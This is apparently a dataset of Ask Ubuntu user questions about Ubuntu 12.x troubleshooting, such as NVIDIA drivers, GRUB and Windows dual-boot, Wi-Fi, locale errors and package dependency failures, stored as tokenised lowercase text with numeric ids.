( rev a1 ) cat /etc/x11/xorg.conf.failsafe returns section `` device '' identifier `` configured video device '' driver `` vesa '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection from the xorg.failsafe.log it looks like the gtx460 is n't being recognised by the x-server , but lspci shows it is correctly identified . lsmod | grep -e nvidia -e nouveau returns nvidia 12319264 0 so an nvidia module is loaded jockey-text -- no-dbus -l returns xorg : nvidia_current - nvidia accelerated graphics driver ( proprietary , enabled , in use ) which is what i enabled from jockey 's gui before the graphics stopped working . since i 'm running out of options , i installed the latest proprietary nvidia drivers 310-19 , which i 'd previously downloaded sh nvidia-linux-x86_64-310.19.run . that appeared to run smoothly with a couple of questions : the distribution-provided pre-install script failed ! continue installation anyway ? answer : yes would you like to register the kernel module sources with dkms ? answer : yes and whilst failsafe graphics mode still hangs on running fsck , i can boot into a normal ubuntu 12.04 console from the grub menu - so this is the best result i 've had . i ca n't run a graphics session : sudo start lightdm gets to starting lightdm display manager [ ok ] stopping anac ( h ) ronistic cron [ ok ] then hangs , which ctrl-alt-del is needed to break . reviewing /var/log/xorg.0.log i found the error ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the ( ee ) nvidia ( 0 ) : system 's kernel log for additional error messages and ( ee ) nvidia ( 0 ) : consult the nvidia readme for details . ( ee ) nvidia ( 0 ) : * aborting * ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 ( ii ) unloadmodule : `` nvidia '' ( ee ) screens found , but none have a usable configuration . fatal server error : no screens found so i reinstalled another version of the nvidia driver . start networking /etc/init.d/networking restart then sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings this time cat /var/log/xorg.0.log ends ( ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ) nvidia ( 0 ) : device dfp-0 ( using edid frequencies has been enabled on ( ** ) nvidia ( 0 ) : all display devices . ) which looks more promising , but attempting to boot ubuntu leads to a black screen.running boot in failsafe graphic mode hangs after fsck - which for some reason it insists on running every time . i 've googled round in circles - can anyone suggest how to get ubuntu to boot into graphics mode ? thanks ! update ... .. i tried a different monitor with a resolution of 1440x900 , also on a dvi-to-dvi cable , and found it worked . the nvidia xserver settings application provides a preset list of resolutions up to 1440 x 900 which work with this smaller monitor , but my achieva shimian qh270-lite requires 2560 x 1440 , which the gtx460 can do , but xserver is n't recognising it . the xorg.0.log contains many instances similar to this : [ 17.253 ] ( ww ) nvidia ( gpu-0 ) : the edid read for display device dfp-0 is invalid : the [ 17.253 ] ( ww ) nvidia ( gpu-0 ) : checksum for edid version 1 extension is invalid . the edid from the samsung and the shimian monitors are n't being read which according to some comments is a problem with nvidia 's drivers . i thought i could fix it by modifying xorg.conf , but i see that file is n't accessed - and again according to comments is deprecated . xvidtune apparently offers monitor seting configuration but the man page says xvidtune is a client interface to the xfree86 x server video mode extension which has been superseded in ubuntu some time ago . secondly it makes a dynamic adjustment , whereas i want to make a static adjustment . the nvidia xserver settings application wo n't allow me to enter a larger size for the monitor than the one i 'm already using ; i 've googled and not found a clear answer to how to change the monitor resolution manually . can anyone help ? i just reposted my final question in brief form in the hope of some contributions here .
236037	how do i know my system updates are trustworthy ?	i routinely update my system whenever it notifies me of software updates . this is one of those things that i just trust to work without knowing the details , but i have become curious recently : how do i know that the process checking for updates will only show legitimate updates ? the updates i receive and install are not malicious ? i know that i have a set of software sources that i specify myself by url and that whether i trust those sources is my decision . but what happens once i specified those urls ? from what is common these days , i would suspect that the authenticity of those sources is verfied with something along the lines of https / ssl , i. e. i have some certificates that are verified against some authority , meaning , i need reliable root certificates installed somewhere ( probably they come with the system ) . further , i guess the packages are cryptographically signed , like with gpg or similar . are those assumptions correct ? where can i inspect keys / certificates used ? how can i verify if they are the right ones ? how can i verify that they are , in fact , used ? are there configuration options that make the process more or less prudent , and what are their defaults ? are there known attacks , or have there been vulnerabilities recently ? i seem to remember windows having a problem like that not long ago . i 'm on 12.04 , but i 'm assuming that this can be answered more generally .
236038	can i recover my data after deleting the partition ?	i got a ubuntu 12.04 key . it corrupted after a sudden power cut and i was not able to open my desktop session . i then tried using an ubuntu live cd but it was not able to mount my drive . i tried some commands which were suggested by my friends like fsck etc . there was a bad super block on my drive but it was all in vain . i suddenly deleted my partition by mistake . i did not understand partitioning . i gave it to a professional for repair and thanks to that windows 8 pro is installed on my device by making new partitions . can i still retrieve my data ?
236045	ubuntu 12.10 xorg loads cpu core at 100 % percent	ubuntu 12.10 xorg loads cpu core at 100 % percent not related to snd_ca0106 . what am i doing wrong ?
236047	google.com redirect malware on ff	l have just installed ubuntu 12.04 on my machine when l started firefox for the first time on typing google.com l redirected to random websites l have also tried conneting the computer to a differnt router same problem also the same laptop is running windows 7 with no such issues . another thing l have just noticed is it only happens when l type google.com if l type www.google.com the redirection does not occur . and this is only happening on firefox l have installed chrome works with no issues .
236052	maas and non-ubuntu images	can i install an operating system other thsan ubuntu using maas ? for example could i install windows ? or solaris ?
236056	exporting docx files as pdfs using libreoffice	i received a .docx file from a colleague with comments added using the 'review/comment ' feature in ms word . i need to convert the document , including the comments , into a pdf , but when i use the 'export as pdf ' option in libreoffice writer , the comments do n't appear in the pdf . i 've tried checking 'export comments ' in the pdf options menu , but it still does n't seem to work . is there any way of fixing this ? i 'm running ubuntu 12.04 with libreoffice 3 . would it work any better with openoffice ?
236057	eclipse ide just show `` general '' and `` cvs '' in wizard	i just installed eclipse ide using ubuntu software center and synaptic , but in both cases it do n't shows for example `` java project '' in the wizard ( file > new ) , just shows general and cvs . how can i fix that ?
236059	how to remove the sit0 network interface ?	when i type ifconfig -a , there is a sit0 , why it is here , and how to delete it ? sit0 link encap : ipv6-in-ipv4 noarp mtu:1480 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
236068	problem installing make command , x11rdp and libxcb1-dev package	i installed x11rdp using the tip here x11rdp best remote desktop on ubuntu 12.04 , its a script that download , build , install and configure x11rdp , i ran once the sudo bash setup.sh , it did n't work because i did n't have the command make so i installed it , the make command ran without trouble except by the package libxcb1-dev , who seems broken , i tried ran apt-get -f install , it did n't work again , i tried update by the update manager , same problem again , i tried use synaptic and did n't work again , any idea to solve that problem or any idea if is something that i have done wrong or that script has done wrong or if its a problem in the package ? ? by the way , even with the broken package i could install x11rdp with the script and i am using without trouble . here the log : the following packages have unmet dependencies : libxcb1-dev : depends : libxcb1 ( = 1.8.1-1 ) but 1.8.1-1ubuntu0.1 is installed depends : libxau-dev ( > = 1:1.0.0-1 ) but 1:1.0.6-4 is installed depends : libxdmcp-dev ( > = 1:1.0.0-1 ) but 1:1.1.0-4 is installed ldconfig deferred processing now taking place and log into the `apt-get -f install` errors were encountered while processing : libxcb1-dev libx11-dev libxfixes-dev e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : dpkg : dependency problems prevent configuration of libxcb1-dev : libxcb1-dev depends on libxcb1 ( = 1.8.1-1 ) ; however : version of libxcb1 on system is 1.8.1-1ubuntu0.1 . dpkg : error processing libxcb1-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libx11-dev : libx11-dev depends on libxcb1-dev ; however : package libxcb1-dev is not configured yet . dpkg : error processing libx11-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libxfixes-dev : libxfixes-dev depends on libx11-dev ; however : package libx11-dev is not configured yet . dpkg : error processing libxfixes-dev ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libxcb1-dev libx11-dev libxfixes-dev
236070	why does ubuntu create a @ home directory on home partition ?	i want several linux distros to share the same home/data partition , each having a unique user name and implicitly a separate home directory . i installed debian wheezy , and formatted this partition as btrfs . but then , when i install ubuntu 13.04 and select that partition as /home it creates a new directory , @ home , in which it puts another folder with the user name . why does this happen ?
236074	how can i create a application launcher for a .sh file for jar file ?	i have a program ( name.jar file ) http : //sourceforge.net/projects/yading/ ? source=recommended that is started by running a double-click name.sh file how can i create a application launcher for a .sh file for jar file ? but it does n't work launcher : gnome-terminal -x sh -c /path/to/script/name.sh right click on panel to create .. no work ! what should i do ?
236075	running garmin ant agent	im looking for the best way to install and run garmin ant agent . ive looked around but there isnt many option . i am running xubuntu 12.10 and have a forerunner 910 xt watch . ive tried using wine to run it but the drop down menu doesnt work correctly as i cant select the option to pair a device as the drop down menu closes . i looked at using virtual machine but wasnt sure about how to set it up correctly i looked at there guide but it didnt help much . any help is greatly appreciated .
236083	difference between /etc/security/pam_env.conf and /etc/environment + making sudo read pam_env.conf	i struggle to see the difference between pam_env.conf and /etc/environment . to me they both do the same thing , with a difference syntax . the manpages were no help . so what is the difference ? additionally , i 'd like to find a way to add paths to the path environment variable for all users . adding them to the two aforementioned files works for all users , but does n't work with sudo , as can be verified by running sudo sh -c 'echo $ path ' . to solve that problem , i believe i should edit the file /etc/pam.d/sudo , but what should i put in there ?
236090	will using a less resource intensive de on top of ubuntu be as fast as a distro which uses that de as default ?	i 'm asking because i find unity to be slow on aged hardware which according to the system requirements should work fine ( 2.53 ghz celeron , 2 gb ram ) . so i want the support of the ubuntu main release ( lts in my case ) but have a more responsive ui using another de , say cinnamon or xfce .
236091	ca n't see wifi ssid	i have installed 12.04.1 on dell latitude e6510 at work i could able connect to wifi and it is ok at home i use dsl wifi modem router which works fine and i can connect thru windows , android phone etc . but ubuntu does n't even see ssid name . only `` my '' ssid name : ( i can see others 03:00.0 network controller : broadcom corporation bcm43224 802.11a/b/g/n ( rev 01 ) my wifi settings are wpa/wpa2 psk thanks
236092	how to force a higher screen resolution from ubuntu 12.04 and an nvidia gtx460 ?	i 'm running ubuntu 12.04 x64 , kernel 3.2.0-24-generic with an nvidia gtx460 and an achieva shimian qh270-lite 2560 x 1440 monitor connected by a dual-link dvi cable . i 've installed the nvidia-current 313-09 drivers from xorg-edgers ( and tried the 310-19 from nvidia ) . neither of these drivers read the edid information from my monitor ( /var/log/xorg.0.log ) and default to lower resolutions which my monitor will not display , resulting in a black screen . full story here if i replace the high-res monitor with a lower resolution 1600 x 900 monitor it works fine . how can i force my video card to the resolution i need ? btw the xorg.conf configuration file is deprecated .
236094	change / choose install path for a .deb	i would like to know if it is possible to choose where a .deb file will be installed , or if it is possible to move it after the installation to another directory without troubles for the app . i am asking that because i am running ubuntu on a 32go 's ssd , and i would like to install some games from humble bundle on my other hdd .
236096	move grub boot loader into another partition	i am dual booting mac os x with ubuntu 64-bit and using the alternative install , when i got to the grub boot loader i acidently selected the wrong partition to install , i installed the grub on the mac os x partition rather than the partition that ubuntu is installed , needless to say this has caused some catastrophic issues , meaning ubuntu wo n't load and goes straight to boot rescue . is there a way to move the grub from one partition to another whilst being in os x ?
236097	vodafone k3570-z datacard not working on ubuntu 12.10 system	i have a vodafone k3570-z usb datacard . it was working fine on ubuntu 12.04 . i just upgraded my system to 12.10 and now i ca n't able to connect my datacard . after plugged to my system even it is not showing in the network panel.can some one tell me how to solve this solution ? any help and suggestions will be really appreciable .
236099	can i install the ordinary php and php-cli on the same machine ?	i want to install php5 on my machine and also php5-cli . i want to first install the ordinary php5 package and then php5-cli . are there likely to be any conflicts if i do this : sudo apt-get install php5 followed by this : sudo apt-get install php5-cli
236100	can i install ubuntu on sony viao ?	i am planning on buying sony viao t series svt13113en ultrabook . it comes in two versions - one with windows 7 and the other with windows 8 . when i asked the sony people if i cud install ubuntu alongside windows - he said there can be problems and errors . is this true ? i 've been using ubuntu and windows on my lenovo laptop for a long time . i had no problems untill recently . my laptop sound is not working in both windows and ubuntu . but can there be problems in laptops if we install windows and linux os side by side ?
236101	problem with installing graphic driver on sis 672	[ need your help please ] i am a novice user of ubuntu . when i install them , my screen resolution is only 800x600 . then i did install vga driver using the drivers available on github . ( git : //github.com/hellnest/xf86-video-sismedia-0.9.1.git cd xf86-video-sismedia-0.9.1 ) . then my screen resolution has been maximized , ie 1280x800 . but the problem is when i connect my pc to the the projector , the image can not be displayed . i use a sis 672 series chipset . i hope someone can help me . thank you .
236109	synchronize panes in byobu	anything similar to tmux synchronize-panes on in byobu with tmux as back-end ? ? i am a cluster admin and would love to use byobu rather than clusterssh which lets me do synchronous writes
236110	user 's password can not be set with passwd	i am running ubuntu as a server , but with x-windows setup . i have ssh , samba and raid 5 setup . was having trouble browsing samba shares from my windows 7 laptop , so i thought it might be a problem with the version of samba and started installing samba4 . well , samba4 was whole another bucket worms . i managed to get the install process to partially finish . after being frustrated i rolled back and reinstalled samba3 . ate this point i tried to create a ssh session with my user freak_storm and the password did not work . so , i went to the box and tried loxing through the x interface . no luck . i tried another user and it logged in . i tried changing freak_storm 's password with 'su passwd freak_storm ' , but it just returns a command prompt . so i tried with the current user 'passwd ' and it asked for current password and command prompt . i logged out and logged back in and now that user is broken . so , i logged through the recovery panel and dropped down to root . 1 ) check password file and it 's not corrupt 2 ) re-installed the passwd package 3 ) deleted and re-installed passwd package . 4 ) removed samba3 and re-installed i 'm now stuck . i really do n't know where to go from here ? any suggestions ? should i do a fresh install ?
236112	youtube unity lens returns no results on 12.10	i 'm having trouble with getting access to youtube 's content via the unity lens . i thought it was my computer 's proxy problem in general , however wikipedia and ask ubuntu lenses both are able to connect . youtube lens shows the general `` sorry there is nothing that matches your search '' message . any one experienced this before ? any ideas ? i could n't find anyone having the same problem on here so decided to open up a new question . any help is appreciated . thanks !
236116	how do i extract the contents of a partition backup done with dd ?	i did a partition backup using dd and produced a .bin file . how do i extract the contents of it ? i would like to extract the contents to a folder say ~/test
236119	how do i troubleshoot problems with my wireless connection ?	let 's say i have a problem with my wireless connection . what commands should i run to share their output with a tech-savvy friend or an online support community ? for example : how can i tell if my wireless card is recognised ? how can i get information on which wireless networks are within range ? how can i tell if i am connected to a wireless , but not the internet ? i 'm asking this question because i 'm seeing many questions about problems with wireless connections , without many details , like this one . it would be useful if i could point to this question so that the asker can improve their question with more information . i 'm hoping for a comprehensive answer with all the details , or with links to other generic questions for brevity .
236122	installing ubuntu on windows 8	i have a windows 8 preloaded computer ( an acer aspire m touch ) and no luck with the shift+restart method does not bring up ufei settings . please help me install ubuntu 64 bit
236124	webex sound hangs in audio conference mode	when i join webex meeting sound hangs periodically so i have to restart my x session relog-in webex meeting to make it works again in meeting ( ubuntu 12.04 32bit ) . it would be great if someone suggests better solution for sound hangs in webex . thanks in advance .
236129	wifi not working on dell inspiron n5520	my laptop came with ubuntu as a pre-loaded os but my brother removed it and installed windows 7 over it and after reinstalling ubuntu wifi is not working . it is not showing available wifi networks . it used to work before and i am sure that my wifi adapter is compatible with linux . i need help installing the drivers of the wifi adapter . laptop details : http : //www.czone.com.pk/laptops-new-an-p.1097.aspx
236130	g++ execution problem but compiles successfully	hello friends , can anybody explain me what is the error in this procedure of compiling and executing a c++ program file .
236131	unable to clean sendmail/ssmtp output queue	i have an old message stuck somewhere . the recipient 's address is invalid and the system keeps trying to re-send despite mail output queue being supposedly empty . any ideas where i should look for the stuck message ? ~ $ mailq mailq : mail queue is empty ~ $ sendmail -bp sendmail : mail queue is empty my /var/log/mail reads : jan 3 17:00:02 my-linux-box ssmtp [ 15504 ] : creating ssl connection to host jan 3 17:00:03 my-linux-box ssmtp [ 15504 ] : ssl connection using rsa_arcfour_sha1 jan 3 17:00:07 my-linux-box ssmtp [ 15504 ] : sent mail for myuser @ myuser.com ( 221 2.0
236134	usb boot failure after using pendrivelinux	i have created a ubuntu 12.04 desktop ( 32-bit ) live usb using the pendrivelinux.com universal usb creator . i selected the `` format drive with fat32 '' option , added maximum persistent storage , but other than those , i simply created the usb . when i start my computer and select to boot using usb hdd , my computer gives me the error message , warning ! boot failure . the usb seems to be loaded with all the necessary stuff . i did not manipulate it after creating it . what is wrong ?
236137	how to add right click format option to a disk icon in the launcher ?	how can i add the format option when right clicking in the icon of a disk in the launcher ? ubuntu 12.04 has this option . how can i make this in ubuntu 12.10 ?
236138	bash scripting issue for a bifurcation diagram data generation	i 'm brand new to this forum ( does n't mean i did n't used it before ) but today i 've a very important question with wich i found no help on the web . i 've a bash script that does n't work and i do n't know why ... my bouncingball program runs perfectly when i call it manually # ! /bin/bash echo `` enter starting value '' read start echo `` enter size of steps '' read steps echo `` enter number of steps '' read number echo `` enter the suitable pecisiion '' read precision for i in $ ( number ) do exec ./home/antoine/bouncingball/bin/debug/boungingball 0.9 120 `` $ start+ ( $ i* $ steps ) '' 3.5 0.95 `` $ precision '' for j in 200 do $ ( sed -n ( $ ( precision ) -200+ $ ( j ) ) 'p ' impactmap.dat ) > > diagbif.dat done done what i want to do with this code is generate an impactmap.dat file with bouncingball and store the 200 last lines in diagbif.dat , then increment some variable of bouncing ball and angain store the 200 last lines of impactmap.dat at the end of diagbif.dat . if someone can help me make it work it would be awesome ! thanks you already !
236142	unable to boot from recovery partition after unistalling ubuntu 12.04 64bit	i have sony vaio laptop of e-series . one day i installed ubuntu 12.04 64bit on my machine , but it is not useful for me . so i uninstalled ubuntu and now i 'm unable to boot from my recovery partition & win7 64bit . how can i regain my system to factory settings ?
236143	distros kernel differences	what 's the difference between two distro 's kernels ? ubuntu uses 3.2.0-29 , opensuse uses 3.5.x , debian uses x.x.x ... is there a major difference ? does this make a distro better then other , i mean , a `` newer '' kernel ( which i think it is ) ?
236151	windows mounting in ubuntu ?	i 'm not sure how to explain this but i 'll try and give it a go . many programmes i have installed on my ubuntu 11.04 operating system are designed for windows only , and so have to be run through wine in order to work . the problem is that i want to mount my iphone to my computer and it is not being recognised by programs i have installed . this is because the programs are searching in the usual windows mounting position for the device rather than where ubuntu mounts them . my iphone is recognised by ubuntu and i can search the majority of the file system so i know that this is definitely the cause of the problem . so basically the question is , how do i fix this issue ? thanks everyone .
236152	ca n't adjust brightness i find a answer but its say a error	i ca n't adjust the contrast on my laptop dell and i found this on this site : open the terminal ctrl+alt+t and type : sudo gedit /etc/default/grub change the line : grub_cmdline_linux= '' '' into grub_cmdline_linux= '' acpi_osi=linux '' save and exit the file . now in the terminal type : sudo update-grub restart your linux . but when i type sudo update-grub it says : /usr/sbin/grub-mkconfig : 35 : /etc/default/grub : syntax error : unterminated quoted string
236158	use a broadcom bcm4318 on dell inspiron 530 and ubuntu 12.10	i have just installed ubuntu 12.10 on a dell inspiron 530 ( where i had installed windows 7 ) with a pci broadcom bcm4318 . i have searched on google and in ask ubuntu and i have tried to follow some tutorials and install some drivers , but nothing worked . right now , i can only connect via rj45 . this is the result from lspci : 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation 82g33/g31/p35/p31 express pci express root port ( rev 02 ) 00:19.0 ethernet controller : intel corporation 82562v-2 10/100 network connection ( rev 02 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation 82801ir ( ich9r ) lpc interface controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801ir/io/ih ( ich9r/do/dh ) 4 port sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 00:1f.5 ide interface : intel corporation 82801i ( ich9 family ) 2 port sata controller [ ide mode ] ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv620 le [ radeon hd 3450 ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv620 hdmi audio [ radeon hd 3400 series ] 02:00.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) do you know how to solve it ? thanks !
236161	ubuntu 12.10 - no grub selection after install a new kernel	i am using ubuntu 12.10 . i compiled myself a new kernel and installed it . after installing , i updated grub . the problem happens here . when my computer reboots , it does n't show me the grub screen to choose old/new kernel or windows 7 ( the screen is black ) . it starts with new kernel only . how can i fix this ? my pc has a graphic card : asus - geforce gt430 .
236163	ubuntu on nvidia tegra 2 ( motorola xoom 3g ) ?	can i flash nexus 7 image of ubuntu 13.04 on motorola xoom ? both devices have nearly same hardware except the processor and screen and also the 3g .
236164	one of my two speakers does n't work	i had ubuntu 12.04 alongside with windows and my speakers both worked fine . now i have only ubuntu 12.04 in my dasktop installed by a cd , and only one of my speakers work right now . any ideas ? thanks in advance .
236165	amazon kindle ( paperwhite ) not recognized	i have a newly bought amazon paperwhite , but when i connect it to my pc , ubuntu does not recognize it . what can i do ?
236166	`` qtquick version 2.0 is not installed '' while trying to run currencyconverter example for ubuntu phone	i was following the step-by-step guide on how to develop an ubuntu phone application but qt creator throughs the error message ( module `` qtquick '' version 2.0 is not installed ) when i run it with qmlscene . seems to me that qt creator utilizes qt4 instead of qt5 . how can i fix this ?
236170	perl : warning : setting locale fail	everytime i try running a command i get this type of error now i am trying sudo apt-get dist-upgrade here is the output error i tried the 1st solution here i get this error while updating and installing software : perl : warning : setting locale failed and it did n't work . as for the second solution . i tried the 1st command and it did n't work . the 2nd command i did n't know where to put it exactly ? did he mean to put it inside the path ? or beneath it ? here is the output error : suhaib @ suhaib : ~ $ sudo apt-get remove pinball [ sudo ] password for suhaib : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libmikmod2 libsdl-image1.2 libsdl-mixer1.2 libwebp2 pinball-data use 'apt-get autoremove ' to remove them . the following packages will be removed : pinball 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 411 kb disk space will be freed . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` '' en_us : en '' '' , lc_all = ( unset ) , lc_time = `` en_ca.utf-8 '' , lc_monetary = `` en_ca.utf-8 '' , lc_address = `` en_ca.utf-8 '' , lc_telephone = `` en_ca.utf-8 '' , lc_name = `` en_ca.utf-8 '' , lc_measurement = `` en_ca.utf-8 '' , lc_identification = `` en_ca.utf-8 '' , lc_numeric = `` en_ca.utf-8 '' , lc_paper = `` en_ca.utf-8 '' , lang = `` '' en_us.utf-8 '' '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... 234427 files and directories currently installed . ) removing pinball ... processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... suhaib @ suhaib : ~ $ here is my locale output suhaib @ suhaib : ~ $ locale locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_us language=en_us lc_ctype= '' en_us '' lc_numeric=en_ca.utf-8 lc_time=en_ca.utf-8 lc_collate= '' en_us '' lc_monetary=en_ca.utf-8 lc_messages= '' en_us '' lc_paper=en_ca.utf-8 lc_name=en_ca.utf-8 lc_address=en_ca.utf-8 lc_telephone=en_ca.utf-8 lc_measurement=en_ca.utf-8 lc_identification=en_ca.utf-8 lc_all= and my environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games ''
236171	how to setup a raid install with ubuntu 12.04 lts ?	i have one pc that has two 120gb hard drives in it . there is currently no operating system installed in my pc . i want to install ubuntu so it will see and use both hard drives for booting and storage as though they were one . i have looked through the faq & blogs and the only one that gets close is the raid setup , however this version of ubuntu does not list raid as an option . i only want ubuntu on these hard drives , how do i go about doing this ?
236172	`` no wubildr '' problem	today , i installed ubuntu v.12.10 under windows 7 using wubi.exe . everything went fine and the program asked me to restart the computer . it then went on installing ubuntu , showing some text including some warnings , which i assume , are normal . it then shows the screen where you can choose between starting windows 7 or ubuntu . i press down and enter to choose ubuntu , and all that happens is a short message that flashes and says : try ( hd0,0 ) ntfs5 : no wubildr try ( hd0,1 ) ntfs5 : ( for about half a second only ) of course i already did a google research but all i found were people where the problem occured under older versions of ubuntu or where ubuntu still loaded after a little while . but in my case , a dark red screen appears during approximately 2-3 seconds and then my notebook ( a samsung r510 ) restarts showing the selection screen between windows 7 and ubuntu . maybe i could add that it is an older notebook with an intel core 2 duo cpu and an nvidia geforce graphics card . i have no other partitions than the normal `` c : '' drive where my windows is installed . i have no usb devide plugged in and no other os installed or anything ... i already tried installing and uninstalling wubi 3 times , but it does n't change anything . i also checked and the wubildr files are all there . one in the c : drive and one in the ubuntu folder , as it is supposed to be . i just wanted to try out ubuntu as an alternative os before maybe changing completely ... please help me , i really can not find any solution to this problem .
236173	gnome3 terminal restores previous window size on focus loss	sometimes when i resize a window in gnome 3 and then switch tasks , the window snaps back to it 's previous size . how can i make it retain the size that i change it to ? for instance , if i drag at the sides of a terminal window to make it a new size it will resize , however when i click on any other window the size of the terminal will shrink back to exactly the same size it was before i resized it . it might only be the terminal window that does this . other windows i have seem retain their size .
236176	problems while using 'quickly create ' on ubuntu .	i 'm watching the `` creating your first ubuntu application '' . i typed into the terminal quickly create ubuntu application my browser , and i got this . leife @ tinetine : ~ $ quickly create ubuntu application mybrowser error : no template specified for command create . usage : quickly create < template > < project-name > candidate templates are : ubuntu-application , ubuntu-cli , ubuntu-flash-game . what should i do ?
236185	how can i calibrate my xbox360 controller in ubuntu 12.10 ?	i was trying to play the walking dead game with my xbox360 controller and it did n't work , in this same site a helpful user told me it was a wine problem and not the driver or the game . so , i tried using the controller in team fortress2 for ubuntu steam , it detects the controller and all , but right stick ( the one for aiming ) only moves horizontaly , and not vertically . i tried a software called `` jstest-gtk '' and it confirmed the problem , the right stick does n't move in the correct axis like the left one . in the game it only moves horizontally but in the software it only moves vertically . when i move the stick vertickally , the pointer in jstest only moves a little , also vertically . when i move the stick horizontally , the pointer in jstest moves a lot , also vertically ( as you can see in the video ) . i thick that is the problem . the left stick moves perfect . i know it 's very difficult to explain in words so i uploaded this video to youtube . i hope it help to figure out what the problem is . i only know the game is not the problem , because it shows the same pattern of the right-stick as jstest-gtk , and that the controller is n't either , because it work perfectly on windows .
236188	why do i only hear sound from the speakers with a2dp headset connected ?	i have a sennheiser mm100 bluetooth stereo headset ( using a2dp ) i 'd like to use on my lubuntu machine . the headset works fine with my phone . please note that unlike all other ubuntu flavours , lubuntu does not come with pulseaudio . it is detected by lubuntu 's blueman bluetooth configuration application and i can establish a connection successfully . it also appears to actually communicate as it shows data being sent back and forth . however , sound keeps coming out of the loudspeakers only , while the headset remains silent . i would have expected the sound to come from my headset at this point . where do i start troubleshooting here ?
236189	problems booting windows 8 with grub 2 help asap	please help . i 'm new to linux , decided to try out ubuntu . created a new partition , and replaced windows 8 boot manager with grub 2 by installing grub on the windows 8 partition now windows does n't want to start and neither does the recovery environment . i ca n't mount that windows 8 partition within ubuntu , either because there 's a hibernation file , even though i shut down windows 8 . it appears to be a new feature : / your help will be very much appreciated have a nice day ; ) in grub , there is a windows 8 entry , 2 memtest entries , ( do n't know what that 's for ) an ubuntu entry , and ubuntu with advanced options ok , now i am able now to mount the windows 8 partition in ubuntu ..weird -anyway the reason why windows 8 is n't starting i think , is because i installed grub on the windows 8 partition so now when i click on windows 8 , it returns me to grub is there a way for me to get back the windows 8 boot manager , and dual boot both os'es , or at least get windows 8 starting up in grub ? here 's a boot info summary : http : //paste.ubuntu.com/1496147/ here 's a new boot info summary after trying to repair the windows 8 bootloader i reinstalled grub afterwards , because i just get a black screen with a white dash flashing at the top left corner . now , while on grub that only happens when i try to boot into windows 8 http : //paste.ubuntu.com/1496572/ now , i just accidentally deleted the ubuntu partition , but i restored the master boot record before . i tried refreshing windows 8 and nothing happened gah ! ! ! i give up ! if i format my entire hard drive and reinstall windows from scratch , that better work ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! here 's what i did from the command prompt in the windows 8 cd diskpart ( this built-in utility will help repartition and format the new drive ) list disk ( this command will list all the drives present on your system . note down the drive number of your usb drive ) select disk # ( replace the # with the drive number that represents your usb drive in the list ) clean ( this command will wipe the entire partition table of the usb drive ) create partition primary ( this command will create a primary partition on the usb drive ) select partition 1 ( this command will select the primary partition for the rest of the process ) format fs=ntfs quick ( this command will quick format the primary partition in ntfs file format ) assign ( this command will assign a drive letter to the new partition for windows to work on ) active ( this command will make the partition active to enable booting ) exit ( closes the diskpart utility ) then i installed windows 8 it works now . man , grub caused me a lot of greif ...
